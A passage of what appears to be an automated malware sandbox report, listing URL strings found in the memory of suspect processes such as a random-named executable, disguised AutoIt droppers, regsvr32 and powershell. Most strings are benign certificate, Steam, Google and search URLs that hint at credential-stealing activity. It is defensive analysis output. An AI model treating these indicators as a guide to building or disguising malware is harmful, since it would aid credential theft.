Source: powershell.exe, 0000001E.00000002.2887929337.0000017CF5B0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3314602796.000001A6A8069000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 00000035.00000003.3407069735.0000534400ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407186954.0000534400770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3406139714.00005344010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000035.00000003.3407069735.0000534400ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407186954.0000534400770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3406139714.00005344010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000035.00000003.3407069735.0000534400ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407186954.0000534400770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3406139714.00005344010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000035.00000003.3407069735.0000534400ED0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407470663.0000534400DDC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3407186954.0000534400770000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3406139714.00005344010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000035.00000002.3659293944.0000534400E18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsSD
Source: Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 0000001E.00000002.2850905264.0000017CE5CC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: regsvr32.exe, 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2850905264.0000017CE5AA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3203609892.000001A698001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.2850905264.0000017CE5CC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3319872912.0000000001811000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000002.3343362556.0000000001813000.00000004.00000020.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000003.3254348296.0000000001810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: f35b37b5a5.exe, 00000017.00000003.2702568906.000000000164D000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: f35b37b5a5.exe, 00000017.00000003.2702568906.000000000164D000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Avoiding.com, 00000015.00000000.2628691877.00000000008A5000.00000002.00000001.01000000.0000000E.sdmp, Macromedia.com, 0000002C.00000003.2847973156.0000000004276000.00000004.00000800.00020000.00000000.sdmp, Macromedia.com, 0000002C.00000000.2840429448.0000000000DD5000.00000002.00000001.01000000.0000001A.sdmp, AchillesGuard.com, 0000003A.00000000.3567803323.0000000000815000.00000002.00000001.01000000.00000023.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: 21a4f8ff7d.exe, 00000018.00000003.2696392550.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, 21a4f8ff7d.exe, 00000018.00000003.2697156252.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 21a4f8ff7d.tmp, 00000019.00000000.2698458342.0000000000401000.00000020.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: powershell.exe, 0000001E.00000002.2893803952.0000017CFDAE6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3332643560.000001A6B07EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000031.00000002.3331858520.000001A6B07CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: 21a4f8ff7d.exe, 00000018.00000003.2696392550.00000000023D0000.00000004.00001000.00020000.00000000.sdmp, 21a4f8ff7d.exe, 00000018.00000003.2697156252.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 21a4f8ff7d.tmp, 00000019.00000000.2698458342.0000000000401000.00000020.00000001.01000000.00000011.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SQ1NgqeTQy.exe, 00000000.00000003.2089785412.0000000005742000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000035.00000003.3407560693.0000534400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3399658717.0000534400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3400477543.0000534400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3584006636.0000534400454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3401483804.0000534400454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: powershell.exe, 0000001E.00000002.2850905264.0000017CE5AA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.3203609892.000001A698001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000031.00000002.3203609892.000001A698228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: chrome.exe, 00000035.00000003.3399942459.0000534400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: chrome.exe, 00000035.00000003.3429623083.00005344013AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000035.00000002.3659449185.0000534400E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: SQ1NgqeTQy.exe, 00000000.00000003.2092219917.0000000005711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: chrome.exe, 00000035.00000002.3656053524.0000534400BB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: f35b37b5a5.exe, 00000017.00000002.2717438117.0000000001695000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chrome.exe, 00000035.00000002.3655923138.0000534400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000035.00000002.3655923138.0000534400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000035.00000002.3655923138.0000534400BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: SQ1NgqeTQy.exe, 00000000.00000003.2064908781.00000000056CE000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065567265.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, SQ1NgqeTQy.exe, 00000000.00000003.2065209198.00000000056CB000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000001D.00000003.3681378503.000000001BEDD000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 00000035.00000003.3409275292.0000534400EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000035.00000002.3658304065.0000534400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3653805554.000053440098C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000035.00000003.3408881451.000053440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3657912664.0000534400D44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3657155467.0000534400CBF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3404378097.0000534400EB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3400344381.0000534400CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000003.3409275292.0000534400EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000035.00000002.3577437267.0000182000920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000035.00000003.3374728308.00003C34002E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000035.00000002.3651228130.00005344006C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000035.00000002.3580826307.000053440001C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=bSD
Source: chrome.exe, 00000035.00000002.3654174423.00005344009CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: f35b37b5a5.exe, 00000017.00000002.2718052434.00000000016A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=eVGzFA1_2smb&a
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: f35b37b5a5.exe, 00000017.00000002.2716816335.000000000164A000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=S_dh0_Jk
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=bHp0
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/ste?
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/steam_share_image.jpg
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, f35b37b5a5.exe, 00000017.00000003.2702464485.00000000016E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=gOyfgA0bHRkL&am
